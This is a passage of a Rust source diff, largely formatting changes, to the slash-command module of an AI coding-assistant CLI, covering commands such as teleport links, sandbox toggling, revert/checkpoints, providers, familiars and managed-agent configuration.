use teleport_bundle::TeleportBundle; use base64::Engine as _; + use teleport_bundle::TeleportBundle; let permissions = { let allowed = ctx.config.allowed_tools.clone(); @@ -7575,7 +8185,11 @@ impl SlashCommand for TeleportCommand { action: PermissionAction::Deny, }); } - TeleportPermissions { allowed, denied, rules } + TeleportPermissions { + allowed, + denied, + rules, + } }; let bundle = TeleportBundle { @@ -7586,22 +8200,28 @@ impl SlashCommand for TeleportCommand { permissions, model: ctx.config.model.clone(), effort: None, - files: Vec::new(), // keep link compact + files: Vec::new(), // keep link compact env: std::collections::HashMap::new(), // omit env for security exported_at: chrono::Utc::now().to_rfc3339(), }; let json = match serde_json::to_string(&bundle) { Ok(j) => j, - Err(e) => return CommandResult::Error(format!("Failed to serialize bundle: {}", e)), + Err(e) => { + return CommandResult::Error(format!("Failed to serialize bundle: {}", e)) + } }; - let encoded = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(json.as_bytes()); + let encoded = + base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(json.as_bytes()); let link = format!("teleport://{}", encoded); // Warn if the link is very long. let size_hint = if link.len() > 8192 { - format!("\n(Link is {} bytes — consider /teleport export for large sessions)", link.len()) + format!( + "\n(Link is {} bytes — consider /teleport export for large sessions)", + link.len() + ) } else { String::new() }; @@ -7609,9 +8229,7 @@ impl SlashCommand for TeleportCommand { CommandResult::Message(format!( "Teleport link generated for session {}:\n\n{}{}\n\n\ Share this link or use: /teleport import ", - ctx.session_id, - link, - size_hint, + ctx.session_id, link, size_hint, )) } @@ -7622,7 +8240,8 @@ impl SlashCommand for TeleportCommand { \x20 /teleport export [--output ] export session to .teleport bundle\n\ \x20 /teleport import restore a .teleport bundle\n\ \x20 /teleport link generate a teleport:// deep link\n\ - \nSee /help teleport for details.".to_string() + \nSee /help teleport for details." + .to_string(), ) } @@ -7638,8 +8257,12 @@ impl SlashCommand for TeleportCommand { #[async_trait] impl SlashCommand for BtwCommand { - fn name(&self) -> &str { "btw" } - fn description(&self) -> &str { "Ask a side question without adding it to conversation history" } + fn name(&self) -> &str { + "btw" + } + fn description(&self) -> &str { + "Ask a side question without adding it to conversation history" + } fn help(&self) -> &str { "Usage: /btw \n\n\ Submits a background question to the model without it becoming part of\n\ @@ -7671,9 +8294,15 @@ impl SlashCommand for BtwCommand { #[async_trait] impl SlashCommand for CtxVizCommand { - fn name(&self) -> &str { "ctx-viz" } - fn aliases(&self) -> Vec<&str> { vec!["context-visualizer", "ctx"] } - fn description(&self) -> &str { "Visualize context window usage breakdown by category" } + fn name(&self) -> &str { + "ctx-viz" + } + fn aliases(&self) -> Vec<&str> { + vec!["context-visualizer", "ctx"] + } + fn description(&self) -> &str { + "Visualize context window usage breakdown by category" + } fn help(&self) -> &str { "Usage: /ctx-viz\n\n\ Shows a detailed breakdown of how the context window is being used:\n\ @@ -7689,16 +8318,17 @@ impl SlashCommand for CtxVizCommand { // Estimate system prompt tokens: rough chars/4 approximation // Build a minimal system prompt to estimate its size. - let sys_prompt_chars: usize = ctx.config.custom_system_prompt + let sys_prompt_chars: usize = ctx + .config + .custom_system_prompt .as_deref() .map(|s| s.len()) .unwrap_or(2400 * 4); // fallback: ~2400 tokens worth let sys_prompt_tokens = (sys_prompt_chars / 4).max(1) as u64; // Estimate conversation tokens from messages - let (conv_chars, tool_chars): (usize, usize) = ctx.messages.iter().fold( - (0, 0), - |(conv, tool), msg| { + let (conv_chars, tool_chars): (usize, usize) = + ctx.messages.iter().fold((0, 0), |(conv, tool), msg| { let text = msg.get_all_text(); // Heuristic: if the message looks like a tool result, count separately if msg.role == claurst_core::types::Role::User && text.starts_with('[') { @@ -7706,8 +8336,7 @@ impl SlashCommand for CtxVizCommand { } else { (conv + text.len(), tool) } - }, - ); + }); let conv_tokens = (conv_chars / 4) as u64; let tool_tokens = (tool_chars / 4) as u64; @@ -7745,9 +8374,15 @@ impl SlashCommand for CtxVizCommand { #[async_trait] impl SlashCommand for SandboxToggleCommand { - fn name(&self) -> &str { "sandbox-toggle" } - fn aliases(&self) -> Vec<&str> { vec!["sandbox"] } - fn description(&self) -> &str { "Enable or disable sandboxed execution of shell commands" } + fn name(&self) -> &str { + "sandbox-toggle" + } + fn aliases(&self) -> Vec<&str> { + vec!["sandbox"] + } + fn description(&self) -> &str { + "Enable or disable sandboxed execution of shell commands" + } fn help(&self) -> &str { "Usage: /sandbox-toggle [on|off|exclude |status]\n\n\ Toggles sandboxed execution of bash/shell commands.\n\ @@ -7768,14 +8403,18 @@ impl SlashCommand for SandboxToggleCommand { // Platform support check: sandbox requires macOS or Linux (not Windows native). let platform = std::env::consts::OS; - let is_wsl = std::env::var("WSL_DISTRO_NAME").is_ok() - || std::env::var("WSL_INTEROP").is_ok(); + let is_wsl = + std::env::var("WSL_DISTRO_NAME").is_ok() || std::env::var("WSL_INTEROP").is_ok(); let is_supported = matches!(platform, "linux" | "macos") || is_wsl; // Handle subcommand: status if args == "status" { let ui = load_ui_settings(); - let mode = if ui.sandbox_mode.unwrap_or(false) { "enabled" } else { "disabled" }; + let mode = if ui.sandbox_mode.unwrap_or(false) { + "enabled" + } else { + "disabled" + }; let excl = if ui.sandbox_excluded_commands.is_empty() { "(none)".to_string() } else { @@ -7788,7 +8427,10 @@ impl SlashCommand for SandboxToggleCommand { let platform_note = if is_supported { format!("\u{2713} Supported on this platform ({})", platform) } else { - format!("\u{2717} Not supported on this platform ({}). Requires macOS, Linux, or WSL2.", platform) + format!( + "\u{2717} Not supported on this platform ({}). Requires macOS, Linux, or WSL2.", + platform + ) }; return CommandResult::Message(format!( "Sandbox mode: {}\n\ @@ -7805,7 +8447,8 @@ impl SlashCommand for SandboxToggleCommand { if rest.is_empty() { return CommandResult::Error( "Usage: /sandbox-toggle exclude \n\ - Example: /sandbox-toggle exclude \"npm run test:*\"".to_string() + Example: /sandbox-toggle exclude \"npm run test:*\"" + .to_string(), ); } // Strip surrounding quotes if present @@ -7832,8 +8475,13 @@ impl SlashCommand for SandboxToggleCommand { } // Platform guard for toggling on/off - if !is_supported && (args == "on" || args == "enable" || args == "enabled" - || args == "true" || args == "1" || args.is_empty()) + if !is_supported + && (args == "on" + || args == "enable" + || args == "enabled" + || args == "true" + || args == "1" + || args.is_empty()) { let msg = if is_wsl { "Error: Sandboxing requires WSL2. WSL1 is not supported.".to_string() @@ -7845,8 +8493,11 @@ impl SlashCommand for SandboxToggleCommand { ) }; // Only hard-block enabling; allow off/status even on unsupported platforms. - if args != "off" && args != "disable" && args != "disabled" - && args != "false" && args != "0" + if args != "off" + && args != "disable" + && args != "disabled" + && args != "false" + && args != "0" { return CommandResult::Error(msg); } @@ -7886,8 +8537,12 @@ impl SlashCommand for SandboxToggleCommand { #[async_trait] impl SlashCommand for HeapdumpCommand { - fn name(&self) -> &str { "heapdump" } - fn description(&self) -> &str { "Show process memory and diagnostic information" } + fn name(&self) -> &str { + "heapdump" + } + fn description(&self) -> &str { + "Show process memory and diagnostic information" + } fn help(&self) -> &str { "Usage: /heapdump\n\n\ Displays a diagnostic snapshot of the current process:\n\ @@ -7944,8 +8599,12 @@ impl SlashCommand for HeapdumpCommand { #[async_trait] impl SlashCommand for InsightsCommand { - fn name(&self) -> &str { "insights" } - fn description(&self) -> &str { "Generate a session analysis report with conversation statistics" } + fn name(&self) -> &str { + "insights" + } + fn description(&self) -> &str { + "Generate a session analysis report with conversation statistics" + } fn help(&self) -> &str { "Usage: /insights\n\n\ Analyses the current conversation and prints a statistics report:\n\ @@ -7956,10 +8615,12 @@ impl SlashCommand for InsightsCommand { let messages = &ctx.messages; // Count turns (user / assistant pairs) - let user_turns: usize = messages.iter() + let user_turns: usize = messages + .iter() .filter(|m| matches!(m.role, claurst_core::types::Role::User)) .count(); - let assistant_turns: usize = messages.iter() + let assistant_turns: usize = messages + .iter() .filter(|m| matches!(m.role, claurst_core::types::Role::Assistant)) .count(); let total_turns = user_turns.min(assistant_turns); @@ -8031,8 +8692,12 @@ impl SlashCommand for InsightsCommand { #[async_trait] impl SlashCommand for UltrareviewCommand { - fn name(&self) -> &str { "ultrareview" } - fn description(&self) -> &str { "Run an exhaustive multi-dimensional code review" } + fn name(&self) -> &str { + "ultrareview" + } + fn description(&self) -> &str { + "Run an exhaustive multi-dimensional code review" + } fn help(&self) -> &str { "Usage: /ultrareview [path]\n\n\ Runs a comprehensive code review that goes beyond /review and\n\ @@ -8135,13 +8800,21 @@ impl SlashCommand for UltrareviewCommand { #[async_trait] impl SlashCommand for NamedCommandAdapter { - fn name(&self) -> &str { self.slash_name } + fn name(&self) -> &str { + self.slash_name + } - fn aliases(&self) -> Vec<&str> { self.slash_aliases.to_vec() } + fn aliases(&self) -> Vec<&str> { + self.slash_aliases.to_vec() + } - fn description(&self) -> &str { self.slash_description } + fn description(&self) -> &str { + self.slash_description + } - fn help(&self) -> &str { self.slash_help } + fn help(&self) -> &str { + self.slash_help + } async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult { execute_named_command_from_slash(self.target_name, args, ctx) @@ -8152,9 +8825,15 @@ impl SlashCommand for NamedCommandAdapter { #[async_trait] impl SlashCommand for UndoCommand { - fn name(&self) -> &str { "undo" } - fn aliases(&self) -> Vec<&str> { vec![] } - fn description(&self) -> &str { "Revert all file changes from the last assistant turn (alias: /revert)" } + fn name(&self) -> &str { + "undo" + } + fn aliases(&self) -> Vec<&str> { + vec![] + } + fn description(&self) -> &str { + "Revert all file changes from the last assistant turn (alias: /revert)" + } fn help(&self) -> &str { "Usage: /undo\n\nReverts all file changes made during the most recent assistant turn.\n\ For finer control use /revert. To list what changed, use /checkpoints." @@ -8169,8 +8848,12 @@ impl SlashCommand for UndoCommand { #[async_trait] impl SlashCommand for RevertCommand { - fn name(&self) -> &str { "revert" } - fn description(&self) -> &str { "Revert file changes from an assistant turn back to pre-turn state" } + fn name(&self) -> &str { + "revert" + } + fn description(&self) -> &str { + "Revert file changes from an assistant turn back to pre-turn state" + } fn help(&self) -> &str { "Usage: /revert [|]\n\n\ Without args: revert the most recent assistant turn.\n\ @@ -8188,22 +8871,25 @@ impl SlashCommand for RevertCommand { async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult { let snap = match claurst_core::snapshot::get_or_create(&ctx.working_dir) { Some(s) => s, - None => return CommandResult::Error( - "Snapshot system unavailable (git not found or not a git repo).".into() - ), + None => { + return CommandResult::Error( + "Snapshot system unavailable (git not found or not a git repo).".into(), + ) + } }; // Collect assistant messages that have a snapshot patch (newest last). - let checkpoints: Vec<&claurst_core::types::Message> = ctx.messages.iter() + let checkpoints: Vec<&claurst_core::types::Message> = ctx + .messages + .iter() .filter(|m| { - m.role == claurst_core::types::Role::Assistant - && m.snapshot_patch.is_some() + m.role == claurst_core::types::Role::Assistant && m.snapshot_patch.is_some() }) .collect(); if checkpoints.is_empty() { return CommandResult::Message( - "No revertible turns found. Run /checkpoints to see recorded file changes.".into() + "No revertible turns found. Run /checkpoints to see recorded file changes.".into(), ); } @@ -8214,13 +8900,17 @@ impl SlashCommand for RevertCommand { } else if let Ok(n) = args.parse::() { if n == 0 || n > checkpoints.len() { return CommandResult::Error(format!( - "Turn {} out of range (1–{}).", n, checkpoints.len() + "Turn {} out of range (1–{}).", + n, + checkpoints.len() )); } Some(checkpoints[checkpoints.len() - n]) } else { - checkpoints.iter().copied() - .find(|m| m.uuid.as_deref().map_or(false, |u| u.starts_with(args))) + checkpoints + .iter() + .copied() + .find(|m| m.uuid.as_deref().is_some_and(|u| u.starts_with(args))) }; let target = match target { @@ -8234,7 +8924,9 @@ impl SlashCommand for RevertCommand { None => return CommandResult::Error("Target turn has no uuid; cannot revert.".into()), }; - let patches: Vec = ctx.messages.iter() + let patches: Vec = ctx + .messages + .iter() .skip_while(|m| m.uuid.as_deref() != Some(&target_uuid)) .filter_map(|m| m.snapshot_patch.clone()) .collect(); @@ -8251,8 +8943,11 @@ impl SlashCommand for RevertCommand { .unwrap_or_else(|| ctx.working_dir.clone()); let path = claurst_core::session_storage::transcript_path(&project_root, &ctx.session_id); if path.exists() { - if let Err(e) = claurst_core::session_storage::truncate_after(&path, &target_uuid).await { - return CommandResult::Error(format!("Reverted files but could not trim transcript: {e}")); + if let Err(e) = claurst_core::session_storage::truncate_after(&path, &target_uuid).await + { + return CommandResult::Error(format!( + "Reverted files but could not trim transcript: {e}" + )); } } @@ -8269,42 +8964,56 @@ impl SlashCommand for RevertCommand { #[async_trait] impl SlashCommand for CheckpointsCommand { - fn name(&self) -> &str { "checkpoints" } - fn description(&self) -> &str { "List assistant turns that have recorded file changes" } + fn name(&self) -> &str { + "checkpoints" + } + fn description(&self) -> &str { + "List assistant turns that have recorded file changes" + } fn help(&self) -> &str { "Usage: /checkpoints\n\nShows all assistant turns in this session that modified files,\n\ with file counts. Use /revert to roll back to a specific turn." } async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult { - let checkpoints: Vec<(usize, &claurst_core::types::Message)> = ctx.messages.iter() + let checkpoints: Vec<(usize, &claurst_core::types::Message)> = ctx + .messages + .iter() .enumerate() .filter(|(_, m)| { - m.role == claurst_core::types::Role::Assistant - && m.snapshot_patch.is_some() + m.role == claurst_core::types::Role::Assistant && m.snapshot_patch.is_some() }) .collect(); if checkpoints.is_empty() { return CommandResult::Message( "No file-change checkpoints recorded yet for this session.\n\ - Checkpoints are created automatically when the assistant modifies files.".into() + Checkpoints are created automatically when the assistant modifies files." + .into(), ); } let total = checkpoints.len(); let mut lines = vec![format!("{} checkpoint(s):", total)]; for (rank, (_, msg)) in checkpoints.iter().rev().enumerate() { - let uuid_short = msg.uuid.as_deref() + let uuid_short = msg + .uuid + .as_deref() .map(|u| &u[..u.len().min(8)]) .unwrap_or("?"); let file_count = msg.snapshot_patch.as_ref().map_or(0, |p| p.files.len()); - let preview: Vec = msg.snapshot_patch.as_ref() + let preview: Vec = msg + .snapshot_patch + .as_ref() .map(|p| { - p.files.iter().take(3) - .map(|f| f.file_name() - .map(|n| n.to_string_lossy().to_string()) - .unwrap_or_default()) + p.files + .iter() + .take(3) + .map(|f| { + f.file_name() + .map(|n| n.to_string_lossy().to_string()) + .unwrap_or_default() + }) .collect() }) .unwrap_or_default(); @@ -8315,7 +9024,10 @@ impl SlashCommand for CheckpointsCommand { }; lines.push(format!( " [{}] {} — {} file(s): {}", - rank + 1, uuid_short, file_count, preview_str + rank + 1, + uuid_short, + file_count, + preview_str )); } lines.push(String::new()); @@ -8328,8 +9040,12 @@ impl SlashCommand for CheckpointsCommand { #[async_trait] impl SlashCommand for SnapshotDiffCommand { - fn name(&self) -> &str { "snapshot" } - fn description(&self) -> &str { "Show shadow-git diff of file changes from an assistant turn" } + fn name(&self) -> &str { + "snapshot" + } + fn description(&self) -> &str { + "Show shadow-git diff of file changes from an assistant turn" + } fn help(&self) -> &str { "Usage: /snapshot [|]\n\n\ Without args: show unified diff for the most recent assistant turn.\n\ @@ -8341,19 +9057,26 @@ impl SlashCommand for SnapshotDiffCommand { async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult { let snap = match claurst_core::snapshot::get_or_create(&ctx.working_dir) { Some(s) => s, - None => return CommandResult::Error( - "Snapshot system unavailable (git not found or not a git repo).".into() - ), + None => { + return CommandResult::Error( + "Snapshot system unavailable (git not found or not a git repo).".into(), + ) + } }; let args = args.trim(); // If a raw hash was passed, use it directly. - let hash = if !args.is_empty() && args.chars().all(|c| c.is_ascii_hexdigit()) && args.len() >= 8 { + let hash = if !args.is_empty() + && args.chars().all(|c| c.is_ascii_hexdigit()) + && args.len() >= 8 + { args.to_string() } else { // Otherwise find the n-th most recent checkpoint. - let checkpoints: Vec<&claurst_core::snapshot::Patch> = ctx.messages.iter() + let checkpoints: Vec<&claurst_core::snapshot::Patch> = ctx + .messages + .iter() .filter_map(|m| { if m.role == claurst_core::types::Role::Assistant { m.snapshot_patch.as_ref() @@ -8374,9 +9097,13 @@ impl SlashCommand for SnapshotDiffCommand { } else { match args.parse::() { Ok(n) if n >= 1 && n <= checkpoints.len() => n - 1, - _ => return CommandResult::Error(format!( - "Turn '{}' out of range (1–{}).", args, checkpoints.len() - )), + _ => { + return CommandResult::Error(format!( + "Turn '{}' out of range (1–{}).", + args, + checkpoints.len() + )) + } } }; // Reverse so idx=0 is newest. @@ -8386,20 +9113,26 @@ impl SlashCommand for SnapshotDiffCommand { let diff = snap.diff(&hash).await; if diff.is_empty() { - CommandResult::Message(format!("No changes since snapshot {}.", &hash[..hash.len().min(8)])) + CommandResult::Message(format!( + "No changes since snapshot {}.", + &hash[..hash.len().min(8)] + )) } else { CommandResult::Message(diff) } } } - // ---- /providers ------------------------------------------------------------- #[async_trait] impl SlashCommand for ProvidersCommand { - fn name(&self) -> &str { "providers" } - fn description(&self) -> &str { "List available AI providers and their status" } + fn name(&self) -> &str { + "providers" + } + fn description(&self) -> &str { + "List available AI providers and their status" + } fn help(&self) -> &str { "Usage: /providers\n\nList all providers registered in the model registry with their\nmodel counts, context windows, and pricing information." } @@ -8429,15 +9162,23 @@ impl SlashCommand for ProvidersCommand { let mut lines = vec!["Available providers:\n".to_string()]; for provider in &provider_keys { let models = &by_provider[provider]; - lines.push(format!("\n{} ({} model{})", provider.to_uppercase(), models.len(), - if models.len() == 1 { "" } else { "s" })); + lines.push(format!( + "\n{} ({} model{})", + provider.to_uppercase(), + models.len(), + if models.len() == 1 { "" } else { "s" } + )); for m in models.iter().take(3) { let cost_str = match (m.cost_input, m.cost_output) { (Some(i), Some(o)) => format!("${:.2}/${:.2} per 1M", i, o), _ => "free/local".to_string(), }; - lines.push(format!(" {} — {}K ctx, {}", - m.info.id, m.info.context_window / 1000, cost_str)); + lines.push(format!( + " {} — {}K ctx, {}", + m.info.id, + m.info.context_window / 1000, + cost_str + )); } if models.len() > 3 { lines.push(format!(" ... and {} more", models.len() - 3)); @@ -8452,8 +9193,12 @@ impl SlashCommand for ProvidersCommand { #[async_trait] impl SlashCommand for ConnectCommand { - fn name(&self) -> &str { "connect" } - fn description(&self) -> &str { "Connect an AI provider" } + fn name(&self) -> &str { + "connect" + } + fn description(&self) -> &str { + "Connect an AI provider" + } fn help(&self) -> &str { "Usage: /connect\n\nOpens the interactive provider picker dialog.\nSelect a provider to see setup instructions." } @@ -8468,8 +9213,12 @@ impl SlashCommand for ConnectCommand { #[async_trait] impl SlashCommand for AgentCommand { - fn name(&self) -> &str { "agent" } - fn description(&self) -> &str { "List available agents or get info about a specific agent" } + fn name(&self) -> &str { + "agent" + } + fn description(&self) -> &str { + "List available agents or get info about a specific agent" + } fn help(&self) -> &str { "Usage: /agent [name]\n\nWithout arguments, lists all available named agents.\nWith a name, shows details for that agent.\n\nTo use an agent, start Coven Code with: --agent " } @@ -8527,9 +9276,7 @@ impl SlashCommand for AgentCommand { if let Some(ref prompt) = def.prompt { output.push_str(&format!("\nSystem prompt prefix:\n {}\n", prompt)); } - output.push_str(&format!( - "\nTo activate: coven-code --agent {}", agent_name - )); + output.push_str(&format!("\nTo activate: coven-code --agent {}", agent_name)); CommandResult::Message(output) } else { CommandResult::Error(format!( @@ -8551,13 +9298,34 @@ impl SlashCommand for AgentCommand { // /familiar reset — clear setting (revert to default kitty) const FAMILIAR_ROSTER: &[(&str, &str)] = &[ - ("kitty", "🐱 Cat familiar — ears, whiskers, square eyes (default)"), - ("nova", "✦ Starry initiator — 4-point star with orbiting sparks"), - ("cody", "🤖 Code familiar — robot face, bracket [ ] eyes, antenna"), - ("charm", "💜 Social familiar — heart, sparkle dots, speech bubble"), - ("sage", "🧙 Research familiar — wizard hat, star, open spellbook"), - ("astra", "🌙 Navigator familiar — crescent moon, compass star, orbit"), - ("echo", "👻 Memory familiar — round ghost, mirror eyes, echo trail"), + ( + "kitty", + "🐱 Cat familiar — ears, whiskers, square eyes (default)", + ), + ( + "nova", + "✦ Starry initiator — 4-point star with orbiting sparks", + ), + ( + "cody", + "🤖 Code familiar — robot face, bracket [ ] eyes, antenna", + ), + ( + "charm", + "💜 Social familiar — heart, sparkle dots, speech bubble", + ), + ( + "sage", + "🧙 Research familiar — wizard hat, star, open spellbook", + ), + ( + "astra", + "🌙 Navigator familiar — crescent moon, compass star, orbit", + ), + ( + "echo", + "👻 Memory familiar — round ghost, mirror eyes, echo trail", + ), ]; /// Merge daemon-declared familiars (`~/.coven/familiars.toml`) with the @@ -8612,26 +9380,33 @@ fn infer_familiar_from_env() -> Option { // Coven member → familiar mapping. // Add entries here as the coven grows. let mapping: &[(&str, &str)] = &[ - ("buns", "nova"), - ("valentina", "nova"), - ("nova", "nova"), - ("kitty", "kitty"), - ("cody", "cody"), - ("charm", "charm"), - ("sage", "sage"), - ("astra", "astra"), - ("echo", "echo"), + ("buns", "nova"), + ("valentina", "nova"), + ("nova", "nova"), + ("kitty", "kitty"), + ("cody", "cody"), + ("charm", "charm"), + ("sage", "sage"), + ("astra", "astra"), + ("echo", "echo"), ]; - mapping.iter() + mapping + .iter() .find(|(name, _)| user_lc.contains(name)) .map(|(_, fam)| fam.to_string()) } #[async_trait] impl SlashCommand for FamiliarCommand { - fn name(&self) -> &str { "familiar" } - fn description(&self) -> &str { "Set your active familiar — changes the TUI mascot live" } - fn aliases(&self) -> Vec<&str> { vec!["familiars"] } + fn name(&self) -> &str { + "familiar" + } + fn description(&self) -> &str { + "Set your active familiar — changes the TUI mascot live" + } + fn aliases(&self) -> Vec<&str> { + vec!["familiars"] + } fn help(&self) -> &str { "Usage: /familiar [name|reset|auto]\n\n\ Without arguments, shows the current familiar and roster.\n\ @@ -8702,7 +9477,11 @@ impl SlashCommand for FamiliarCommand { Some(name) => format!( "Familiar set to {}. {} ", name, - roster.iter().find(|(n, _)| n == name).map(|(_, d)| d.as_str()).unwrap_or("") + roster + .iter() + .find(|(n, _)| n == name) + .map(|(_, d)| d.as_str()) + .unwrap_or("") ), None => "Familiar reset to default (kitty).".to_string(), }; @@ -8715,8 +9494,12 @@ impl SlashCommand for FamiliarCommand { #[async_trait] impl SlashCommand for ManagedAgentsCommand { - fn name(&self) -> &str { "managed-agents" } - fn description(&self) -> &str { "Configure and manage the manager-executor agent architecture" } + fn name(&self) -> &str { + "managed-agents" + } + fn description(&self) -> &str { + "Configure and manage the manager-executor agent architecture" + } fn help(&self) -> &str { "Usage: /managed-agents [subcommand]\n\n\ Subcommands:\n\ @@ -8737,24 +9520,36 @@ impl SlashCommand for ManagedAgentsCommand { } async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult { - use claurst_core::{BudgetSplitPolicy, ManagedAgentConfig, builtin_managed_agent_presets}; + use claurst_core::{builtin_managed_agent_presets, BudgetSplitPolicy, ManagedAgentConfig}; let args = args.trim(); // Helper to format current config as status string fn format_status(cfg: &Option) -> String { match cfg { - None => "Managed Agents: NOT CONFIGURED\n\nRun /managed-agents setup to get started.".to_string(), + None => { + "Managed Agents: NOT CONFIGURED\n\nRun /managed-agents setup to get started." + .to_string() + } Some(c) => { - let state = if c.enabled { "ACTIVE" } else { "CONFIGURED but inactive" }; + let state = if c.enabled { + "ACTIVE" + } else { + "CONFIGURED but inactive" + }; let budget_str = match c.total_budget_usd { Some(b) => format!("${:.2} total", b), None => "no cap".to_string(), }; let split_str = match &c.budget_split { BudgetSplitPolicy::SharedPool => "shared pool".to_string(), - BudgetSplitPolicy::Percentage { manager_pct } => format!("{}% manager", manager_pct), - BudgetSplitPolicy::FixedCaps { manager_usd, executor_usd } => { + BudgetSplitPolicy::Percentage { manager_pct } => { + format!("{}% manager", manager_pct) + } + BudgetSplitPolicy::FixedCaps { + manager_usd, + executor_usd, + } => { format!("${:.2} mgr / ${:.2} exe", manager_usd, executor_usd) } }; @@ -8797,7 +9592,10 @@ impl SlashCommand for ManagedAgentsCommand { let presets = builtin_managed_agent_presets(); let mut out = "Managed Agents Setup\n\nQuickstart — apply a preset:\n\n".to_string(); for p in &presets { - out.push_str(&format!(" /managed-agents preset {}\n {}\n\n", p.name, p.description)); + out.push_str(&format!( + " /managed-agents preset {}\n {}\n\n", + p.name, p.description + )); } out.push_str("\nOr configure manually:\n /managed-agents configure manager-model \n /managed-agents configure executor-model \n /managed-agents enable\n\nModel format: provider/model (e.g. anthropic/claude-opus-4-6, openai/gpt-4o, google/gemini-2.5-flash)\nAny provider registered in the ProviderRegistry can be used."); return CommandResult::Message(out); @@ -8805,7 +9603,9 @@ impl SlashCommand for ManagedAgentsCommand { if let Some(preset_name) = args.strip_prefix("preset ").map(str::trim) { let presets = builtin_managed_agent_presets(); - let found = presets.iter().find(|p| p.name.eq_ignore_ascii_case(preset_name)); + let found = presets + .iter() + .find(|p| p.name.eq_ignore_ascii_case(preset_name)); match found { None => { let names: Vec<&str> = presets.iter().map(|p| p.name).collect(); @@ -8845,17 +9645,21 @@ impl SlashCommand for ManagedAgentsCommand { } if let Some(rest) = args.strip_prefix("configure ").map(str::trim) { - let mut cfg = ctx.config.managed_agents.clone().unwrap_or(ManagedAgentConfig { - enabled: false, - manager_model: String::new(), - executor_model: String::new(), - executor_max_turns: 10, - max_concurrent_executors: 4, - budget_split: BudgetSplitPolicy::SharedPool, - total_budget_usd: None, - preset_name: None, - executor_isolation: false, - }); + let mut cfg = ctx + .config + .managed_agents + .clone() + .unwrap_or(ManagedAgentConfig { + enabled: false, + manager_model: String::new(), + executor_model: String::new(), + executor_max_turns: 10, + max_concurrent_executors: 4, + budget_split: BudgetSplitPolicy::SharedPool, + total_budget_usd: None, + preset_name: None, + executor_isolation: false, + }); if let Some(val) = rest.strip_prefix("manager-model ").map(str::trim) { cfg.manager_model = val.to_string(); @@ -8884,21 +9688,42 @@ impl SlashCommand for ManagedAgentsCommand { cfg.budget_split = BudgetSplitPolicy::SharedPool; } else if let Some(pct_str) = val.strip_prefix("percentage:") { match pct_str.parse::() { - Ok(pct) => cfg.budget_split = BudgetSplitPolicy::Percentage { manager_pct: pct }, - Err(_) => return CommandResult::Error(format!("Invalid percentage: '{}'", pct_str)), + Ok(pct) => { + cfg.budget_split = BudgetSplitPolicy::Percentage { manager_pct: pct } + } + Err(_) => { + return CommandResult::Error(format!( + "Invalid percentage: '{}'", + pct_str + )) + } } } else if let Some(caps_str) = val.strip_prefix("fixed:") { let parts: Vec<&str> = caps_str.splitn(2, ':').collect(); if parts.len() == 2 { match (parts[0].parse::(), parts[1].parse::()) { - (Ok(m), Ok(e)) => cfg.budget_split = BudgetSplitPolicy::FixedCaps { manager_usd: m, executor_usd: e }, - _ => return CommandResult::Error("Invalid fixed caps format. Use fixed::".to_string()), + (Ok(m), Ok(e)) => { + cfg.budget_split = BudgetSplitPolicy::FixedCaps { + manager_usd: m, + executor_usd: e, + } + } + _ => { + return CommandResult::Error( + "Invalid fixed caps format. Use fixed::" + .to_string(), + ) + } } } else { - return CommandResult::Error("Invalid fixed caps format. Use fixed::".to_string()); + return CommandResult::Error( + "Invalid fixed caps format. Use fixed::".to_string(), + ); } } else { - return CommandResult::Error("Use: shared | percentage: | fixed::".to_string()); + return CommandResult::Error( + "Use: shared | percentage: | fixed::".to_string(), + ); } } else { return CommandResult::Error(format!( @@ -8915,7 +9740,10 @@ impl SlashCommand for ManagedAgentsCommand { } let mut new_config = ctx.config.clone(); new_config.managed_agents = Some(cfg); - return CommandResult::ConfigChangeMessage(new_config, "Managed agents configuration updated.".to_string()); + return CommandResult::ConfigChangeMessage( + new_config, + "Managed agents configuration updated.".to_string(), + ); } if let Some(amount_str) = args.strip_prefix("budget ").map(str::trim) { @@ -8923,7 +9751,12 @@ impl SlashCommand for ManagedAgentsCommand { Err(_) => return CommandResult::Error(format!("Invalid amount: '{}'", amount_str)), Ok(amount) => { let mut cfg = match ctx.config.managed_agents.clone() { - None => return CommandResult::Error("No managed agents config. Run /managed-agents setup first.".to_string()), + None => { + return CommandResult::Error( + "No managed agents config. Run /managed-agents setup first." + .to_string(), + ) + } Some(c) => c, }; cfg.total_budget_usd = if amount <= 0.0 { None } else { Some(amount) }; @@ -8947,11 +9780,17 @@ impl SlashCommand for ManagedAgentsCommand { if args == "enable" { let mut cfg = match ctx.config.managed_agents.clone() { - None => return CommandResult::Error("No managed agents config. Run /managed-agents setup first.".to_string()), + None => { + return CommandResult::Error( + "No managed agents config. Run /managed-agents setup first.".to_string(), + ) + } Some(c) => c, }; if cfg.manager_model.is_empty() || cfg.executor_model.is_empty() { - return CommandResult::Error("manager_model and executor_model must be set before enabling.".to_string()); + return CommandResult::Error( + "manager_model and executor_model must be set before enabling.".to_string(), + ); } cfg.enabled = true; if let Err(e) = save_settings_mutation(|settings| { @@ -8962,7 +9801,10 @@ impl SlashCommand for ManagedAgentsCommand { } let mut new_config = ctx.config.clone(); new_config.managed_agents = Some(cfg); - return CommandResult::ConfigChangeMessage(new_config, "Managed agents ENABLED.".to_string()); + return CommandResult::ConfigChangeMessage( + new_config, + "Managed agents ENABLED.".to_string(), + ); } if args == "disable" { @@ -8979,7 +9821,10 @@ impl SlashCommand for ManagedAgentsCommand { } let mut new_config = ctx.config.clone(); new_config.managed_agents = Some(cfg); - return CommandResult::ConfigChangeMessage(new_config, "Managed agents disabled.".to_string()); + return CommandResult::ConfigChangeMessage( + new_config, + "Managed agents disabled.".to_string(), + ); } if args == "reset" { @@ -8991,7 +9836,10 @@ impl SlashCommand for ManagedAgentsCommand { } let mut new_config = ctx.config.clone(); new_config.managed_agents = None; - return CommandResult::ConfigChangeMessage(new_config, "Managed agents configuration removed.".to_string()); + return CommandResult::ConfigChangeMessage( + new_config, + "Managed agents configuration removed.".to_string(), + ); } CommandResult::Error(format!( @@ -9005,8 +9853,7 @@ impl SlashCommand for ManagedAgentsCommand { // Registry // --------------------------------------------------------------------------- -/// Return all built-in slash commands. -pub fn all_commands() -> Vec> { +static COMMANDS: 